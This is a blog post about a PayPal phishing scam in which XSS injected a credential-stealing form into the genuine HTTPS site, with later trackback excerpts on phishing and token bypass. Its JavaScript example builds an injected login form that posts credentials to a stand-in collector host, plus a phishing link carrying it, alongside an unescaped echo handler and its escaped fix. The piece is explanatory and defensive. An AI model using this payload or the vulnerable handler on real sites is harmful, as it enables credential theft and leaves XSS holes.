Paypal Phishing Scam: XSS Beats SSL
In an article by Netcraft, Paypal users are faced with a new threat: phishing emails sent by spammers and worms redirect users to the genuine Paypal site, then use a Cross Site Scripting (XSS) vulnerability to inject code into the Paypal page that steals personal information. Here are the details of the exploit.
The scam works quite convincingly, by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal; however, some of the content on the page has been modified by the fraudsters via a cross-site scripting technique (XSS).
I am pretty sure that Paypal would have removed this problem from their site already. My main worry now is that other commerce and financial websites might have the same problems. The point of this exploit is that XSS can be used to deceive a user into trusting a tampered page just because the site presents a valid TLS/SSL certificate (most people know this as HTTPS, or the little padlock you see in your browser when visiting secure websites). The certificate only proves that the browser is talking to the real host over an encrypted connection; it says nothing about whether the content of the page is what the site intended to serve.
XSS works by exploiting a weakness in the website, typically user-supplied input that is echoed into a page without proper encoding, to insert arbitrary content. That content can be HTML or JavaScript (yes, executable scripts), and because it is served from the genuine site it runs with that site's origin in the browser. With code like this, it is possible to transmit whatever the user types to other, untrusted destinations; in this case, a Korean-hosted phish collector server. It is scary because users are confident that this is a secure site since the digital certificate of the website was valid, and the XSS vulnerability lets phishers take advantage of that sense of security.
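The pattern described above, as an added example that is not part of the original post and not code from Paypal or Netcraft: a page on the legitimate host echoes a query parameter straight into its HTML, so a link to the real site can carry a login form that posts to the attacker. The origin, the search path and the collector hostname are hypothetical. The hardened version escapes the parameter before placing it in the page, which turns the injected form into harmless text.

```javascript
// Added example (not from the original post, Paypal or Netcraft).
// Hostnames and paths below are hypothetical stand-ins.

// Vulnerable server-side handler: echoes the query parameter into the page
// unencoded. The page is served by the genuine host over HTTPS, so the
// browser shows a valid certificate regardless of what this function emits.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Search results for: ${query}</h1></body></html>`;
}

// Minimal HTML escaping for text placed in element content.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened handler: the same page, with the parameter encoded before output.
function renderSearchHardened(query) {
  return `<html><body><h1>Search results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Attacker's collector (hypothetical) and the HTML the phishing link injects:
// a login form that posts the victim's credentials off-site.
const COLLECTOR = 'https://collector.example.net/steal';
const payload =
  `<form action="${COLLECTOR}" method="post">` +
  'Email: <input name="email"> Password: <input name="password" type="password">' +
  '<input type="submit" value="Log In"></form>';

// The link sent in the phishing email: it points at the legitimate origin.
function buildPhishingUrl(legitimateOrigin, payloadHtml) {
  return `${legitimateOrigin}/search?q=${encodeURIComponent(payloadHtml)}`;
}

// Simulate the victim's browser following the link and the server rendering it.
function simulateRequest(url, renderer) {
  const q = new URL(url).searchParams.get('q') || '';
  return renderer(q);
}

// Check whether the rendered page contains a form whose action leaves the
// legitimate origin. That is the attacker's goal here.
function containsOffHostForm(html, legitimateOrigin) {
  const re = /<form\b[^>]*\baction=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (!m[1].startsWith(legitimateOrigin)) return true;
  }
  return false;
}

const ORIGIN = 'https://www.example-bank.test'; // stands in for the genuine site
const phishingUrl = buildPhishingUrl(ORIGIN, payload);
const vulnerablePage = simulateRequest(phishingUrl, renderSearchVulnerable);
const hardenedPage = simulateRequest(phishingUrl, renderSearchHardened);

console.log('phishing link:', phishingUrl);
console.log('vulnerable page carries off-host form:', containsOffHostForm(vulnerablePage, ORIGIN));
console.log('hardened page carries off-host form:', containsOffHostForm(hardenedPage, ORIGIN));
```

Note that the URL the victim clicks really is on the legitimate host, and the padlock and certificate are genuine on both versions of the page; only the encoding of the echoed parameter decides whether the attacker's form appears. The check used here (an off-origin form action) is a crude illustration of what to look for, not a general XSS detector.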
This is not new at all. There are many articles about phishing scams that use XSS to insert scripts into SSL-protected websites. Providers normally fix these flaws quickly, but as customers there is always that window of vulnerability, so it is best to play safe. It might be worth revisiting my old blog entry about a few ways to avoid phishing. It is mainly about IVR phishing, but the general principles apply.

July 15th, 2006 at 9:36 am
[…] Looks like phishers are really being more and more creative these days. Previously, I wrote a number of blog entries about phishing. One particular entry was about a way to use XSS vulnerabilities to beat SSL security which was previously used on Paypal. The scary part is that phishers already have started exploiting these XSS vulnerabilities and integrating them into phishing schemes. Here is an article from NetworkWorld describing the increased use of phishing to beat token-based authentication systems. These systems are primarily used for e-banking and other secure online transactions! Scammers have found a way around new token-based authentication systems that have been adopted by some banks. Over the past few weeks, approximately 35 phishing Web sites have been set up that use the new attack. They attempt to trick users into divulging the temporary passwords created by the security token devices used by banks such as Citigroup, said Rich Miller, an analyst with Internet research company Netcraft. Phishers have only recently begun looking for ways around token authentication, using what is known as a “man-in-the-middle” attack, Miller said. “These attacks are worrisome because they took advantage, fairly early on, of a system that’s seen as enhancing security for banking customers,” he said. […]
September 10th, 2006 at 3:52 am
[…] The same thing can be achieved if the bookmarks on one’s computer are correctly encoded and if TLS/SSL is used. However, this may be problematic if the target site is prone to TLS/SSL phishing. For even greater security, two (2) way TLS/SSL (and optionally secure browser triggered) should also be used for more comprehensive security. […]